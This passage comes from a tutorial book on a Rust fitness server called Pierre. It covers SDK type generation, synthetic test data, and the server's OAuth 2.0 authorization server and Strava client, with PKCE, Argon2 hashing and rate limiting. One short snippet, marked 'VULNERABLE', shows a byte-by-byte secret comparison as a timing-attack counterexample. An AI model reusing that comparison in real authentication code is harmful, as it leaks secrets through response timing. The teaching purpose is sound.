cd sdk && npm run generate-types
5. TypeScript SDK uses generated types
|
import { GetActivitiesParams } from './types';
const params: GetActivitiesParams = { provider: "strava", limit: 10 };
6. Compile-time type checking
|
// TypeScript compiler validates:
// - provider is required
// - limit is optional number
// - invalid_field causes compile error
Key benefit: Changes to Rust tool schemas automatically propagate to TypeScript SDK after regeneration.
Testing with Synthetic Data
Combine synthetic data with the provider for comprehensive tests:
Conceptual usage (from tests/intelligence_synthetic_helpers_test.rs):
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_beginner_progression_detection() {
// Generate realistic training data
let mut builder = SyntheticDataBuilder::new(42);
let activities = builder.generate_pattern(TrainingPattern::BeginnerRunnerImproving);
// Load into synthetic provider
let provider = SyntheticProvider::with_activities(activities);
// Test intelligence algorithms without OAuth
let result = provider.get_activities(Some(50), None).await.unwrap();
// Verify progression pattern detected
assert_eq!(result.items.len(), 24); // 6 weeks * 4 runs/week
// ... validate metrics, trends, etc.
}
}
Testing benefits:
- No OAuth: Tests run without network or external APIs
- Deterministic: Seeded RNG ensures reproducible results
- Realistic: Patterns match real-world training data
- Fast: In-memory provider, no database required
Key Takeaways
- Single source of truth: Rust tool schemas generate both runtime validation and TypeScript types.
- Automated workflow: npm run generate-types fetches schemas from the running server and generates interfaces.
- JSON Schema to TypeScript: The script maps JSON Schema types to idiomatic TypeScript (union types, optional properties, generics).
- Type-safe tooling: The generated ToolParamsMap enables compile-time validation of tool calls.
- Synthetic data: A deterministic builder pattern generates realistic fitness data for testing without OAuth.
- Builder pattern: A fluent API with #[must_use] prevents common test setup errors.
- Thread-safe testing: The synthetic provider uses Arc<RwLock<T>> for concurrent test access.
- Schema-driven development: Changes to server tools automatically flow to the SDK after regeneration.
- Training patterns: Pre-built scenarios (beginner progression, overtraining, injury recovery) test intelligence algorithms.
- Type safety layers: Compile-time (Rust + TypeScript), runtime (JSON-RPC validation), and test-time (synthetic data) checks guarantee correctness.
End of Part IV: SDK & Type System
You’ve completed the SDK and type system implementation. You now understand:
- SDK bridge architecture (Chapter 13)
- Automated type generation from server schemas (Chapter 14)
Next Chapter: Chapter 15: OAuth 2.0 Server Implementation - Begin Part V by learning how Pierre implements OAuth 2.0 server functionality for fitness provider authentication.
Chapter 15: OAuth 2.0 Server Implementation
This chapter explores how Pierre implements a full OAuth 2.0 authorization server for secure MCP client authentication. You’ll learn about RFC 7591 dynamic client registration, PKCE (RFC 7636), authorization code flow, and JWT-based access tokens.
OAuth 2.0 Server Architecture
Pierre implements a standards-compliant OAuth 2.0 authorization server:
┌──────────────┐ ┌──────────────┐
│ MCP Client │ │ Pierre │
│ (SDK) │ │ OAuth 2.0 │
│ │ │ Server │
└──────────────┘ └──────────────┘
│ │
│ 1. POST /oauth2/register │
│ (dynamic client registration) │
├─────────────────────────────────►│
│ │
│ client_id, client_secret │
│◄─────────────────────────────────┤
│ │
│ 2. GET /oauth2/authorize │
│ (with PKCE code_challenge) │
├─────────────────────────────────►│
│ │
│ Redirect to login page │
│◄─────────────────────────────────┤
│ │
│ 3. POST /oauth2/login │
│ (user credentials) │
├─────────────────────────────────►│
│ │
│ Redirect with auth code │
│◄─────────────────────────────────┤
│ │
│ 4. POST /oauth2/token │
│ (exchange code + verifier) │
├─────────────────────────────────►│
│ │
│ access_token (JWT) │
│◄─────────────────────────────────┤
OAuth 2.0 flow: Pierre supports authorization code flow with PKCE (mandatory for security).
OAuth Context and Routes
The OAuth server shares context across all endpoint handlers:
Source: src/routes/oauth2.rs:36-49
#![allow(unused)]
fn main() {
/// OAuth 2.0 server context shared across all handlers
#[derive(Clone)]
pub struct OAuth2Context {
/// Database for client and token storage
pub database: Arc<Database>,
/// Authentication manager for JWT operations
pub auth_manager: Arc<AuthManager>,
/// JWKS manager for public key operations
pub jwks_manager: Arc<JwksManager>,
/// Server configuration
pub config: Arc<ServerConfig>,
/// Rate limiter for OAuth endpoints
pub rate_limiter: Arc<OAuth2RateLimiter>,
}
}
Route registration:
Source: src/routes/oauth2.rs:69-97
#![allow(unused)]
fn main() {
impl OAuth2Routes {
/// Create all OAuth 2.0 routes with context
pub fn routes(context: OAuth2Context) -> Router {
Router::new()
// RFC 8414: OAuth 2.0 Authorization Server Metadata
.route(
"/.well-known/oauth-authorization-server",
get(Self::handle_discovery),
)
// RFC 7517: JWKS endpoint
.route("/.well-known/jwks.json", get(Self::handle_jwks))
// RFC 7591: Dynamic Client Registration
.route("/oauth2/register", post(Self::handle_client_registration))
// OAuth 2.0 Authorization endpoint
.route("/oauth2/authorize", get(Self::handle_authorization))
// OAuth 2.0 Token endpoint
.route("/oauth2/token", post(Self::handle_token))
// Login page and submission
.route("/oauth2/login", get(Self::handle_oauth_login_page))
.route("/oauth2/login", post(Self::handle_oauth_login_submit))
// Token validation endpoints
.route(
"/oauth2/validate-and-refresh",
post(Self::handle_validate_and_refresh),
)
.route("/oauth2/token-validate", post(Self::handle_token_validate))
.with_state(context)
}
}
}
Endpoints:
- /.well-known/oauth-authorization-server: OAuth discovery (RFC 8414)
- /.well-known/jwks.json: Public keys for JWT verification
- /oauth2/register: Dynamic client registration (RFC 7591)
- /oauth2/authorize: Authorization endpoint (user consent)
- /oauth2/token: Token endpoint (code exchange)
OAuth Discovery Endpoint
The discovery endpoint advertises server capabilities (RFC 8414):
Source: src/routes/oauth2.rs:100-128
#![allow(unused)]
fn main() {
/// Handle OAuth 2.0 discovery (RFC 8414)
async fn handle_discovery(State(context): State<OAuth2Context>) -> Json<serde_json::Value> {
let issuer_url = context.config.oauth2_server.issuer_url.clone();
// Use spawn_blocking for JSON serialization (CPU-bound operation)
let discovery_json = tokio::task::spawn_blocking(move || {
serde_json::json!({
"issuer": issuer_url,
"authorization_endpoint": format!("{issuer_url}/oauth2/authorize"),
"token_endpoint": format!("{issuer_url}/oauth2/token"),
"registration_endpoint": format!("{issuer_url}/oauth2/register"),
"jwks_uri": format!("{issuer_url}/.well-known/jwks.json"),
"grant_types_supported": ["authorization_code", "client_credentials", "refresh_token"],
"response_types_supported": ["code"],
"token_endpoint_auth_methods_supported": ["client_secret_post", "client_secret_basic"],
"scopes_supported": ["fitness:read", "activities:read", "profile:read"],
"response_modes_supported": ["query"],
"code_challenge_methods_supported": ["S256"]
})
})
.await
.unwrap_or_else(|_| {
serde_json::json!({
"error": "internal_error",
"error_description": "Failed to generate discovery document"
})
});
Json(discovery_json)
}
}
Discovery response (example):
{
"issuer": "http://localhost:8081",
"authorization_endpoint": "http://localhost:8081/oauth2/authorize",
"token_endpoint": "http://localhost:8081/oauth2/token",
"registration_endpoint": "http://localhost:8081/oauth2/register",
"jwks_uri": "http://localhost:8081/.well-known/jwks.json",
"grant_types_supported": ["authorization_code", "client_credentials", "refresh_token"],
"response_types_supported": ["code"],
"token_endpoint_auth_methods_supported": ["client_secret_post", "client_secret_basic"],
"scopes_supported": ["fitness:read", "activities:read", "profile:read"],
"response_modes_supported": ["query"],
"code_challenge_methods_supported": ["S256"]
}
Key fields:
- code_challenge_methods_supported: ["S256"]: Only SHA-256 PKCE (the plain method is rejected for security)
- grant_types_supported: Authorization code, client credentials, refresh token
- token_endpoint_auth_methods_supported: Client authentication methods
Dynamic Client Registration (RFC 7591)
MCP clients register dynamically to obtain OAuth credentials:
Source: src/oauth2_server/models.rs:11-26
#![allow(unused)]
fn main() {
/// OAuth 2.0 Client Registration Request (RFC 7591)
#[derive(Debug, Deserialize)]
pub struct ClientRegistrationRequest {
/// Redirect URIs for authorization code flow
pub redirect_uris: Vec<String>,
/// Optional client name for display
pub client_name: Option<String>,
/// Optional client URI for information
pub client_uri: Option<String>,
/// Grant types the client can use
pub grant_types: Option<Vec<String>>,
/// Response types the client can use
pub response_types: Option<Vec<String>>,
/// Scopes the client can request
pub scope: Option<String>,
}
}
Client registration handler:
Source: src/oauth2_server/client_registration.rs:39-108
#![allow(unused)]
fn main() {
/// Register a new OAuth 2.0 client (RFC 7591)
///
/// # Errors
/// Returns an error if client registration validation fails or database storage fails
pub async fn register_client(
&self,
request: ClientRegistrationRequest,
) -> Result<ClientRegistrationResponse, OAuth2Error> {
// Validate request
Self::validate_registration_request(&request)?;
// Generate client credentials
let client_id = Self::generate_client_id();
let client_secret = Self::generate_client_secret()?;
let client_secret_hash = Self::hash_client_secret(&client_secret)?;
// Set default values - only authorization_code by default for security (RFC 8252 best practices)
// Clients must explicitly request client_credentials if needed
let grant_types = request
.grant_types
.unwrap_or_else(|| vec!["authorization_code".to_owned()]);
let response_types = request
.response_types
.unwrap_or_else(|| vec!["code".to_owned()]);
let created_at = Utc::now();
let expires_at = Some(created_at + Duration::days(365)); // 1 year expiry
// Create client record
let client = OAuth2Client {
id: Uuid::new_v4().to_string(),
client_id: client_id.clone(),
client_secret_hash,
redirect_uris: request.redirect_uris.clone(),
grant_types: grant_types.clone(),
response_types: response_types.clone(),
client_name: request.client_name.clone(),
client_uri: request.client_uri.clone(),
scope: request.scope.clone(),
created_at,
expires_at,
};
// Store in database
self.store_client(&client).await.map_err(|e| {
tracing::error!(error = %e, client_id = %client_id, "Failed to store OAuth2 client registration in database");
OAuth2Error::invalid_request("Failed to store client registration")
})?;
// Return registration response
let default_client_uri = Self::get_default_client_uri();
Ok(ClientRegistrationResponse {
client_id,
client_secret,
client_id_issued_at: Some(created_at.timestamp()),
client_secret_expires_at: expires_at.map(|dt| dt.timestamp()),
redirect_uris: request.redirect_uris,
grant_types,
response_types,
client_name: request.client_name,
client_uri: request.client_uri.or(Some(default_client_uri)),
scope: request
.scope
.or_else(|| Some("fitness:read activities:read profile:read".to_owned())),
})
}
}
Security measures:
- Argon2 hashing: Client secrets are hashed before storage (never stored in plaintext)
- 365-day expiry: Client registrations expire after 1 year
- Default grant types: Only authorization_code by default (least privilege)
- Redirect URI validation: URIs are validated during registration
Rust Idioms: Argon2 for Credential Hashing
Pierre uses Argon2 (winner of Password Hashing Competition) for client secret hashing:
Conceptual implementation (from client_registration.rs):
#![allow(unused)]
fn main() {
use argon2::{
password_hash::{rand_core::OsRng, PasswordHasher, SaltString},
Argon2,
};
fn hash_client_secret(secret: &str) -> Result<String, OAuth2Error> {
let salt = SaltString::generate(&mut OsRng);
let argon2 = Argon2::default();
let password_hash = argon2
.hash_password(secret.as_bytes(), &salt)
.map_err(|_| OAuth2Error::invalid_request("Failed to hash client secret"))?;
Ok(password_hash.to_string())
}
}
Why Argon2:
- Memory-hard: Resistant to GPU/ASIC attacks
- Tunable: Adjustable time/memory cost parameters
- Winner of PHC: Industry-standard recommendation
- Constant-time: Safe against timing attacks
Authorization Endpoint with PKCE
The authorization endpoint requires PKCE (Proof Key for Code Exchange) for security:
Source: src/oauth2_server/endpoints.rs:70-156
#![allow(unused)]
fn main() {
/// Handle authorization request (GET /oauth/authorize)
///
/// # Errors
/// Returns an error if client validation fails, invalid parameters, or authorization code generation fails
pub async fn authorize(
&self,
request: AuthorizeRequest,
user_id: Option<Uuid>, // From authentication
tenant_id: Option<String>, // From JWT claims
) -> Result<AuthorizeResponse, OAuth2Error> {
// Validate client
let client = self
.client_manager
.get_client(&request.client_id)
.await
.map_err(|e| {
tracing::error!(
"Client lookup failed for client_id={}: {:#}",
request.client_id,
e
);
OAuth2Error::invalid_client()
})?;
// Validate response type
if request.response_type != "code" {
return Err(OAuth2Error::invalid_request(
"Only 'code' response_type is supported",
));
}
// Validate redirect URI
if !client.redirect_uris.contains(&request.redirect_uri) {
return Err(OAuth2Error::invalid_request("Invalid redirect_uri"));
}
// Validate PKCE parameters (RFC 7636)
if let Some(ref code_challenge) = request.code_challenge {
// Validate code_challenge format (base64url-encoded, 43-128 characters)
if code_challenge.len() < 43 || code_challenge.len() > 128 {
return Err(OAuth2Error::invalid_request(
"code_challenge must be between 43 and 128 characters",
));
}
// Validate code_challenge_method - only S256 is allowed (RFC 7636 security best practice)
let method = request.code_challenge_method.as_deref().unwrap_or("S256");
if method != "S256" {
return Err(OAuth2Error::invalid_request(
"code_challenge_method must be 'S256' (plain method is not supported for security reasons)",
));
}
} else {
// PKCE is required for authorization code flow
return Err(OAuth2Error::invalid_request(
"code_challenge is required for authorization_code flow (PKCE)",
));
}
// User authentication required
let user_id =
user_id.ok_or_else(|| OAuth2Error::invalid_request("User authentication required"))?;
// Generate authorization code with tenant isolation and state binding
let tenant_id = tenant_id.unwrap_or_else(|| user_id.to_string());
let auth_code = self
.generate_authorization_code(AuthCodeParams {
client_id: &request.client_id,
user_id,
tenant_id: &tenant_id,
redirect_uri: &request.redirect_uri,
scope: request.scope.as_deref(),
state: request.state.as_deref(),
code_challenge: request.code_challenge.as_deref(),
code_challenge_method: request.code_challenge_method.as_deref(),
})
.await
.map_err(|e| {
tracing::error!(
"Failed to generate authorization code for client_id={}: {:#}",
request.client_id,
e
);
OAuth2Error::invalid_request("Failed to generate authorization code")
})?;
Ok(AuthorizeResponse {
code: auth_code,
state: request.state,
})
}
}
PKCE validation:
- Required: code_challenge is mandatory (no fallback to plain OAuth)
- S256 only: The SHA-256 method is required (the plain method is rejected for security)
- Length validation: 43-128 characters (base64url-encoded SHA-256)
PKCE Flow Explained
PKCE prevents authorization code interception attacks:
Client generates random verifier:
verifier = random(43-128 chars)
Client creates challenge:
challenge = base64url(sha256(verifier))
Authorization request includes challenge:
GET /oauth2/authorize?
client_id=...&
redirect_uri=...&
code_challenge=<challenge>&
code_challenge_method=S256
Server stores challenge with authorization code
Token request includes verifier:
POST /oauth2/token
grant_type=authorization_code&
code=<auth_code>&
code_verifier=<verifier>&
...
Server validates:
if base64url(sha256(verifier)) == stored_challenge:
issue_token()
else:
reject_request()
Security benefit: Even if authorization code is intercepted, attacker cannot exchange it without the original code_verifier (which never leaves the client).
Token Endpoint
The token endpoint exchanges authorization codes for JWT access tokens:
Source: src/oauth2_server/endpoints.rs:163-186
#![allow(unused)]
fn main() {
/// Handle token request (POST /oauth/token)
///
/// # Errors
/// Returns an error if client validation fails or token generation fails
pub async fn token(&self, request: TokenRequest) -> Result<TokenResponse, OAuth2Error> {
// ALWAYS validate client credentials for ALL grant types (RFC 6749 Section 6)
// RFC 6749 Section 6 states: "If the client type is confidential or the client was issued
// client credentials, the client MUST authenticate with the authorization server"
// MCP clients are confidential clients, so authentication is REQUIRED
self.client_manager
.validate_client(&request.client_id, &request.client_secret)
.await
.inspect_err(|e| {
tracing::error!(
client_id = %request.client_id,
grant_type = %request.grant_type,
error = ?e,
"OAuth client validation failed"
);
})?;
match request.grant_type.as_str() {
"authorization_code" => self.handle_authorization_code_grant(request).await,
"client_credentials" => self.handle_client_credentials_grant(request),
"refresh_token" => self.handle_refresh_token_grant(request).await,
_ => Err(OAuth2Error::unsupported_grant_type()),
}
}
}
Grant types:
- authorization_code: Exchange an authorization code for an access token (with PKCE verification)
- client_credentials: Machine-to-machine authentication (no user context)
- refresh_token: Renew an expired access token without re-authentication
Constant-Time Client Validation
Client credential validation uses constant-time comparison to prevent timing attacks:
Source: src/oauth2_server/client_registration.rs:114-153
#![allow(unused)]
fn main() {
/// Validate client credentials
///
/// # Errors
/// Returns an error if client is not found, credentials are invalid, or client is expired
pub async fn validate_client(
&self,
client_id: &str,
client_secret: &str,
) -> Result<OAuth2Client, OAuth2Error> {
tracing::debug!("Validating OAuth client: {}", client_id);
let client = self.get_client(client_id).await.map_err(|e| {
tracing::warn!("OAuth client {} not found: {}", client_id, e);
OAuth2Error::invalid_client()
})?;
tracing::debug!("OAuth client {} found, validating secret", client_id);
// Verify client secret using constant-time comparison via Argon2
let parsed_hash = PasswordHash::new(&client.client_secret_hash).map_err(|e| {
tracing::error!("Failed to parse stored password hash: {}", e);
OAuth2Error::invalid_client()
})?;
let argon2 = Argon2::default();
if argon2
.verify_password(client_secret.as_bytes(), &parsed_hash)
.is_err()
{
tracing::warn!("OAuth client {} secret validation failed", client_id);
return Err(OAuth2Error::invalid_client());
}
// Check if client is expired
if let Some(expires_at) = client.expires_at {
if Utc::now() > expires_at {
tracing::warn!("OAuth client {} has expired", client_id);
return Err(OAuth2Error::invalid_client());
}
}
tracing::info!("OAuth client {} validated successfully", client_id);
Ok(client)
}
}
Constant-time guarantee: Argon2’s verify_password uses constant-time comparison to prevent timing side-channel attacks.
Rust Idioms: Constant-Time Operations
Timing attack vulnerability:
#![allow(unused)]
fn main() {
// VULNERABLE: Early return leaks information about secret length
if client_secret.len() != stored_secret.len() {
return Err(...); // Attacker learns length immediately
}
for (a, b) in client_secret.bytes().zip(stored_secret.bytes()) {
if a != b {
return Err(...); // Attacker learns position of mismatch
}
}
}
Constant-time solution (Argon2):
#![allow(unused)]
fn main() {
// SECURE: Always takes same time regardless of input
argon2.verify_password(client_secret.as_bytes(), &parsed_hash)
}
Why this matters: Timing attacks can recover secrets character-by-character by measuring response times.
Multi-Tenant OAuth Management
Pierre provides tenant-specific OAuth credential isolation:
Source: src/tenant/oauth_manager.rs:14-46
#![allow(unused)]
fn main() {
/// Credential configuration for storing OAuth credentials
#[derive(Debug, Clone)]
pub struct CredentialConfig {
/// OAuth client ID (public)
pub client_id: String,
/// OAuth client secret (to be encrypted)
pub client_secret: String,
/// OAuth redirect URI
pub redirect_uri: String,
/// OAuth scopes
pub scopes: Vec<String>,
/// User who configured these credentials
pub configured_by: Uuid,
}
/// Per-tenant OAuth credentials with decrypted secret
#[derive(Debug, Clone)]
pub struct TenantOAuthCredentials {
/// Tenant ID that owns these credentials
pub tenant_id: Uuid,
/// OAuth provider name
pub provider: String,
/// OAuth client ID (public)
pub client_id: String,
/// OAuth client secret (decrypted)
pub client_secret: String,
/// OAuth redirect URI
pub redirect_uri: String,
/// OAuth scopes
pub scopes: Vec<String>,
/// Daily rate limit for this tenant
pub rate_limit_per_day: u32,
}
}
Credential resolution:
Source: src/tenant/oauth_manager.rs:76-100
#![allow(unused)]
fn main() {
/// Load OAuth credentials for a specific tenant and provider
///
/// # Errors
///
/// Returns an error if no credentials are found for the tenant/provider combination
pub async fn get_credentials(
&self,
tenant_id: Uuid,
provider: &str,
database: &Database,
) -> Result<TenantOAuthCredentials> {
// Priority 1: Try tenant-specific credentials first (in-memory cache, then database)
if let Some(credentials) = self
.try_tenant_specific_credentials(tenant_id, provider, database)
.await
{
return Ok(credentials);
}
// Priority 2: Fallback to server-level OAuth configuration
if let Some(credentials) = self.try_server_level_credentials(tenant_id, provider) {
return Ok(credentials);
}
// No credentials found - return error
Err(AppError::not_found(format!(
"No OAuth credentials configured for tenant {} and provider {}. Configure {}_CLIENT_ID and {}_CLIENT_SECRET environment variables, or provide tenant-specific credentials via the MCP OAuth configuration tool.",
tenant_id, provider, provider.to_uppercase(), provider.to_uppercase()
)).into())
}
}
Credential priority:
- Tenant-specific credentials (highest priority): Custom OAuth apps per tenant
- Server-level credentials (fallback): Shared OAuth apps from environment variables
- Error (no credentials): Inform the user how to configure credentials
OAuth Rate Limiting
Pierre implements rate limiting for OAuth endpoints:
Source: src/routes/oauth2.rs:136-149
#![allow(unused)]
fn main() {
async fn handle_client_registration(
State(context): State<OAuth2Context>,
ConnectInfo(addr): ConnectInfo<SocketAddr>,
Json(request): Json<ClientRegistrationRequest>,
) -> Response {
// Extract client IP from connection using Axum's ConnectInfo extractor
let client_ip = addr.ip();
let rate_status = context.rate_limiter.check_rate_limit("register", client_ip);
if rate_status.is_limited {
return (
StatusCode::TOO_MANY_REQUESTS,
Json(serde_json::json!({
"error": "too_many_requests",
"error_description": "Rate limit exceeded"
})),
)
.into_response();
}
// ... continue registration
}
}
Rate-limited endpoints:
- /oauth2/register: Prevent client registration spam
- /oauth2/authorize: Prevent authorization request floods
- /oauth2/token: Prevent token-exchange brute-forcing
Key Takeaways
- RFC compliance: Pierre implements RFC 7591 (client registration), RFC 7636 (PKCE), and RFC 8414 (discovery).
- PKCE mandatory: The authorization code flow requires PKCE with SHA-256 (no plain method).
- Argon2 hashing: Client secrets are hashed with Argon2 (memory-hard, constant-time verification).
- Constant-time validation: Client credential verification prevents timing attacks.
- JWT access tokens: OAuth access tokens are JWTs (the same format as Pierre authentication tokens).
- Multi-tenant isolation: Tenant-specific OAuth credentials with separate rate limits.
- Discovery endpoint: RFC 8414 metadata allows clients to auto-discover the OAuth configuration.
- 365-day expiry: Client registrations expire after 1 year (security best practice).
- Rate limiting: OAuth endpoints are protected against abuse with IP-based rate limiting.
- Grant type defaults: Only authorization_code by default (least privilege principle).
Next Chapter: Chapter 16: OAuth 2.0 Client for Fitness Providers - Learn how Pierre acts as an OAuth client to connect to fitness providers like Strava and Fitbit.
Chapter 16: OAuth 2.0 Client for Fitness Providers
This chapter explores how Pierre acts as an OAuth 2.0 client to connect to fitness providers like Strava and Fitbit. You’ll learn about the OAuth client implementation, PKCE generation, token management, and provider-specific integrations.
OAuth Client Architecture
Pierre implements a generic OAuth 2.0 client that works with multiple fitness providers:
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Pierre │ │ Fitness │ │ User │
│ Server │ │ Provider │ │ Browser │
│ │ │ (Strava) │ │ │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
│ 1. Generate PKCE params │ │
│ (verifier + challenge) │ │
├─────────────────────────────────┼────────────────────────────────►│
│ │ │
│ 2. Build authorization URL │ │
│ with code_challenge │ │
├─────────────────────────────────┼────────────────────────────────►│
│ │ │
│ │ 3. User authorizes Pierre │
│ │◄────────────────────────────────┤
│ │ │
│ 4. OAuth callback │ │
│◄────────────────────────────────┼─────────────────────────────────┤
│ with authorization code │ │
│ │ │
│ 5. POST /oauth/token │ │
│ (code + code_verifier) │ │
├────────────────────────────────►│ │
│ │ │
│ 6. Access token + refresh token│ │
│◄────────────────────────────────┤ │
│ │ │
│ 7. Store tokens in database │ │
│ │ │
Client role: Pierre initiates OAuth flows with fitness providers to access user data.
OAuth Client Configuration
Each OAuth client needs provider-specific configuration:
Source: src/oauth2_client/client.rs:16-33
#![allow(unused)]
fn main() {
/// OAuth 2.0 client configuration
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct OAuth2Config {
/// OAuth client ID from provider
pub client_id: String,
/// OAuth client secret from provider
pub client_secret: String,
/// Authorization endpoint URL
pub auth_url: String,
/// Token endpoint URL
pub token_url: String,
/// Redirect URI for OAuth callbacks
pub redirect_uri: String,
/// OAuth scopes to request
pub scopes: Vec<String>,
/// Whether to use PKCE for enhanced security
pub use_pkce: bool,
}
}
Configuration fields:
- client_id / client_secret: Provider application credentials
- auth_url: Provider's authorization endpoint (e.g., https://www.strava.com/oauth/authorize)
- token_url: Provider's token endpoint (e.g., https://www.strava.com/oauth/token)
- redirect_uri: Pierre's callback URL (e.g., http://localhost:8081/api/oauth/callback/strava)
- scopes: Requested permissions (e.g., ["activity:read_all", "profile:read"])
- use_pkce: Enable PKCE for security (recommended)
PKCE Parameter Generation
Pierre generates PKCE parameters to protect authorization codes:
Source: src/oauth2_client/client.rs:35-70
#![allow(unused)]
fn main() {
/// `PKCE` (Proof Key for Code Exchange) parameters for enhanced `OAuth2` security
#[derive(Debug, Clone)]
pub struct PkceParams {
/// Randomly generated code verifier (43-128 characters)
pub code_verifier: String,
/// SHA256 hash of code verifier, base64url encoded
pub code_challenge: String,
/// Challenge method (always "S256" for SHA256)
pub code_challenge_method: String,
}
impl PkceParams {
/// Generate `PKCE` parameters with `S256` challenge method
#[must_use]
pub fn generate() -> Self {
// Generate a cryptographically secure random code verifier (43-128 characters)
const CHARS: &[u8] = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~";
let mut rng = rand::thread_rng();
let code_verifier: String = (0
..crate::constants::network_config::OAUTH_CODE_VERIFIER_LENGTH)
.map(|_| CHARS[rng.gen_range(0..CHARS.len())] as char)
.collect();
// Create S256 code challenge
let mut hasher = Sha256::new();
hasher.update(code_verifier.as_bytes());
let hash = hasher.finalize();
let code_challenge = URL_SAFE_NO_PAD.encode(hash);
Self {
code_verifier,
code_challenge,
code_challenge_method: "S256".into(),
}
}
}
}
PKCE generation steps:
- Generate verifier: Random 43-128 character string from allowed charset
- Hash verifier: SHA-256 hash of verifier bytes
- Base64url encode: URL-safe base64 encoding without padding
- Return params: Verifier (kept secret) and challenge (sent to provider)
Rust Idioms: Base64url Encoding
Source: src/oauth2_client/client.rs:9
#![allow(unused)]
fn main() {
use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _};
}
Usage:
#![allow(unused)]
fn main() {
let code_challenge = URL_SAFE_NO_PAD.encode(hash);
}
Why URL_SAFE_NO_PAD:
- URL-safe: Uses - and _ instead of + and / (safe in query parameters)
- No padding: Omits trailing = characters (RFC 7636 requirement)
- Standard compliant: Matches the OAuth 2.0 PKCE specification
Authorization URL Construction
The client builds authorization URLs for user consent:
Source: src/oauth2_client/client.rs:149-177
#![allow(unused)]
fn main() {
/// Get authorization `URL` with `PKCE` support
///
/// # Errors
///
/// Returns an error if the authorization URL is malformed
pub fn get_authorization_url_with_pkce(
&self,
state: &str,
pkce: &PkceParams,
) -> Result<String> {
let mut url = Url::parse(&self.config.auth_url).context("Invalid auth URL")?;
let mut query_pairs = url.query_pairs_mut();
query_pairs
.append_pair("client_id", &self.config.client_id)
.append_pair("redirect_uri", &self.config.redirect_uri)
.append_pair("response_type", "code")
.append_pair("scope", &self.config.scopes.join(" "))
.append_pair("state", state);
if self.config.use_pkce {
query_pairs
.append_pair("code_challenge", &pkce.code_challenge)
.append_pair("code_challenge_method", &pkce.code_challenge_method);
}
drop(query_pairs);
Ok(url.to_string())
}
}
Generated URL example:
https://www.strava.com/oauth/authorize?
client_id=12345&
redirect_uri=http://localhost:8081/api/oauth/callback/strava&
response_type=code&
scope=activity:read_all%20profile:read&
state=abc123&
code_challenge=E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM&
code_challenge_method=S256
Query parameters:
- `response_type=code`: Authorization code flow
- `scope`: Space-separated permissions
- `state`: CSRF protection token
- `code_challenge` / `code_challenge_method`: PKCE security
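A std-only sketch of the same URL assembly, to make the query-string shape concrete. Real code should use the `url` crate as Pierre does; the toy percent-encoder here handles only `:` and spaces, just enough for this example:

```rust
// Simplified sketch of authorization URL construction (illustrative only).
// A real implementation must percent-encode all reserved characters.
fn encode(v: &str) -> String {
    v.replace(':', "%3A").replace(' ', "%20")
}

fn build_auth_url(base: &str, pairs: &[(&str, &str)]) -> String {
    let query: Vec<String> = pairs
        .iter()
        .map(|(k, v)| format!("{k}={}", encode(v)))
        .collect();
    format!("{base}?{}", query.join("&"))
}

fn main() {
    let url = build_auth_url(
        "https://www.strava.com/oauth/authorize",
        &[
            ("client_id", "12345"),
            ("response_type", "code"),
            ("scope", "activity:read_all profile:read"),
            ("state", "abc123"),
        ],
    );
    assert!(url.contains("scope=activity%3Aread_all%20profile%3Aread"));
    println!("{url}");
}
```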
OAuth Token Structure
The client handles OAuth tokens with expiration tracking:
Source: src/oauth2_client/client.rs:72-101
#![allow(unused)]
fn main() {
/// OAuth 2.0 access token with expiration and refresh capabilities
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct OAuth2Token {
/// The access token string
pub access_token: String,
/// Token type (usually "Bearer")
pub token_type: String,
/// Expiration timestamp (UTC)
pub expires_at: Option<DateTime<Utc>>,
/// Optional refresh token for getting new access tokens
pub refresh_token: Option<String>,
/// Granted OAuth scopes
pub scope: Option<String>,
}
impl OAuth2Token {
/// Check if the token is expired
#[must_use]
pub fn is_expired(&self) -> bool {
self.expires_at
.is_some_and(|expires_at| expires_at <= Utc::now())
}
/// Check if the token will expire within 5 minutes
#[must_use]
pub fn will_expire_soon(&self) -> bool {
self.expires_at
.is_some_and(|expires_at| expires_at <= Utc::now() + Duration::minutes(5))
}
}
}
Expiration logic:
- `is_expired()`: Token expired (`Utc::now() >= expires_at`)
- `will_expire_soon()`: Token expires within 5 minutes (proactive refresh)
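The same logic can be sketched with `std::time` instead of chrono (the real `OAuth2Token` uses `chrono::DateTime<Utc>`; the struct here is a simplified stand-in):

```rust
use std::time::{Duration, SystemTime};

// Simplified token with the two expiration checks from OAuth2Token.
struct Token {
    expires_at: Option<SystemTime>,
}

impl Token {
    fn is_expired(&self) -> bool {
        self.expires_at.is_some_and(|t| t <= SystemTime::now())
    }

    fn will_expire_soon(&self) -> bool {
        self.expires_at
            .is_some_and(|t| t <= SystemTime::now() + Duration::from_secs(5 * 60))
    }
}

fn main() {
    // Expires in 2 minutes: not expired yet, but within the 5-minute buffer.
    let token = Token {
        expires_at: Some(SystemTime::now() + Duration::from_secs(120)),
    };
    assert!(!token.is_expired());
    assert!(token.will_expire_soon());

    // No expiration recorded: treated as never expiring.
    let no_expiry = Token { expires_at: None };
    assert!(!no_expiry.is_expired());
}
```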
Rust Idioms: Option::is_some_and
Source: src/oauth2_client/client.rs:90-93
#![allow(unused)]
fn main() {
pub fn is_expired(&self) -> bool {
self.expires_at
.is_some_and(|expires_at| expires_at <= Utc::now())
}
}
Idiom: Option::is_some_and(predicate) combines is_some() and predicate check in one operation.
Equivalent verbose code:
#![allow(unused)]
fn main() {
// Less idiomatic:
self.expires_at.is_some() && self.expires_at.unwrap() <= Utc::now()
// Idiomatic:
self.expires_at.is_some_and(|expires_at| expires_at <= Utc::now())
}
Benefits:
- No unwrap: Predicate only called if Some
- Concise: Single method call instead of chaining
- Clear intent: “check if some AND condition holds”
Token Exchange
The client exchanges authorization codes for access tokens:
Source: src/oauth2_client/client.rs:205-237
#![allow(unused)]
fn main() {
/// Exchange authorization code with `PKCE` support
///
/// # Errors
///
/// Returns an error if the token exchange request fails or response is invalid
pub async fn exchange_code_with_pkce(
&self,
code: &str,
pkce: &PkceParams,
) -> Result<OAuth2Token> {
let mut params = vec![
("client_id", self.config.client_id.as_str()),
("client_secret", self.config.client_secret.as_str()),
("code", code),
("grant_type", "authorization_code"),
